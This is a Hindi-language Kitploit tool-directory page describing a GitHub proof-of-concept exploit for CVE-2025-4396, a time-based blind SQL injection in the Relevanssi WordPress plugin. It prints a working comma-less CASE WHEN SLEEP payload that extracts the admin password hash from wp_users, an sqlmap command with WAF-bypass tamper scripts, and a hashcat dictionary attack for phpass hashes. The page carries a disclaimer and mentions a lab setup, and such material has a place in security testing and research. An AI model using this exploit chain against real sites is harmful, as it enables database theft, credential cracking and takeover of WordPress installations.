Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-4396 — CVE-2025-4396 - WordPress Relevanssi Time-Based Blind SQL Injection | Kitploit
उपकरण/GitHubGitHub/sup3rdav3/cve-2025-4396
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationLabs & Practice
GitHubsup3rdav3/cve-2025-4396

CVE-2025-4396

CVE-2025-4396 - WordPress Relevanssi Time-Based Blind SQL Injection

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-4396 — Relevanssi SQL इंजेक्शन (समय-आधारित ब्लाइंड)

अस्वीकरण: यह रिपॉजिटरी केवल अधिकृत पैठ परीक्षण, सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है।


अवलोकन

Relevanssi 4.24.4 वर्डप्रेस प्लगइन में समय-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। यह कार्यान्वयन विशेष रूप से ऐसे कठोर वातावरणों को संबोधित करता है जहां:

  • कॉमा फ़िल्टर किए जाते हैं — मानक SUBSTR(str, pos, len) और IF(cond, true, false) सिंटैक्स को तोड़ते हैं
  • लालची स्लीप व्यवहार होता है — जिससे MySQL SLEEP() को पूरे अभिव्यक्ति का मूल्यांकन करने से पहले निष्पादित करता है, जिससे गलत सकारात्मक परिणाम उत्पन्न होते हैं

पृष्ठभूमि

कुछ वातावरणों में (जैसे DVWP लैब), मानक SQL इंजेक्शन पेलोड दो प्रमुख कारणों से विफल होते हैं:

समस्याप्रभाव
कॉमा हटानाSUBSTR(str, pos, len) और IF(cond, true, false) को तोड़ता है
लालची SLEEP()MySQL पूर्ण बूलियन अभिव्यक्ति से पहले स्लीप का मूल्यांकन करता है, जिससे गलत सकारात्मक परिणाम होते हैं

दोनों समस्याओं के लिए लक्षित समाधानों की आवश्यकता है — नीचे मैन्युअल और स्वचालित दृष्टिकोणों में शामिल किए गए हैं।


मैन्युअल एक्सप्लॉइट (asy.py)

एक एसिंक्रोनस पायथन स्क्रिप्ट जो सर्जिकल कैरेक्टर-दर-कैरेक्टर निष्कर्षण प्रदान करती है। स्वचालित टूल का ओवरहेड से बचती है और CASE WHEN लॉजिक के माध्यम से कॉमा फ़िल्टरिंग को बायपास करती है।

विशेषताएँ

विशेषताकार्यान्वयन
Async I/Oaiohttp गैर-अवरुद्ध अनुरोधों के लिए

कोर इंजेक्शन लॉजिक

root@kitploit:~
# Comma-less, CASE WHEN-based time-based payload
condition = f"ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1) FROM {pos} FOR 1))>{mid}"
injection = f"1*(SELECT CASE WHEN ({condition}) THEN SLEEP(3) ELSE 1 END)"

IF() के बजाय CASE WHEN क्यों? IF() कॉमा का उपयोग करता है और लालची मूल्यांकन के अधीन है। CASE WHEN आलसी मूल्यांकन करता है, जिससे सुनिश्चित होता है कि SLEEP() केवल तभी ट्रिगर होता है जब स्थिति वास्तव में TRUE हो।


स्वचालित एक्सप्लॉइट (SQLMap)

SQLMap इस वातावरण में विशिष्ट टैम्पर स्क्रिप्ट और फ्लैग का उपयोग करके खोज को स्वचालित कर सकता है।

कमांड

root@kitploit:~
python3 sqlmap.py -u "http://localhost:31337/?s=test&cats=1*" \
  --tamper=commalessmid,if2case,between \
  --technique=T \
  --dbms=MySQL \
  --no-cast \
  --batch \
  --threads=1 \
  --dbs

फ्लैग संदर्भ

--threads=1 पर नोट: यह विश्वसनीय निष्कर्षण के लिए आवश्यक है। कई थ्रेड स्लीप विलंब को ओवरलैप करने का कारण बनते हैं, जिससे बाइनरी सर्च समय खराब हो जाता है और गलत आउटपुट उत्पन्न होता है।


प्रयोगशाला निष्कर्ष

फ़ील्डमान
लक्ष्यWordPress table

हैश को क्रैक करना

root@kitploit:~
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
  • मोड -m 400 phpass हैश को लक्षित करता है
  • हमला -a 0 rockyou.txt का उपयोग करके एक सीधा शब्दकोश हमला है

संदर्भ

  • Relevanssi Plugin — WordPress.org
  • SQLMap Tamper Scripts
  • OWASP: Blind SQL Injection
  • phpass — Password Hashing Framework
टूल डाउनलोड करें
कॉमा-रहित पेलोडSUBSTR(str FROM pos FOR len) सिंटैक्स
गैर-लालची तर्कCASE WHEN सुनिश्चित करता है कि SLEEP() केवल TRUE पर सक्रिय हो
फ्लैगउद्देश्य
--tamper=commalessmid,if2caseपेलोड को कॉमा-मुक्त SQL में पुनर्लिखित करता है; IF() को CASE WHEN से बदलता है
--tamper=betweenअतिरिक्त WAF बायपास के लिए > तुलनाओं को BETWEEN से बदलता है
--technique=Tकेवल समय-आधारित ब्लाइंड इंजेक्शन तक सीमित करता है
--no-castCAST() रैपर को रोकता है जो निषिद्ध कॉमा पेश करते हैं
--threads=1समय सटीकता सुनिश्चित करता है — समवर्ती अनुरोध ओवरलैपिंग स्लीप विलंब का कारण बनते हैं
wp_users
उपयोगकर्ताadmin (ID = 1)
निकाला गया हैशREDACTED
एल्गोरिदमphpass (मानक वर्डप्रेस पासवर्ड हैशिंग)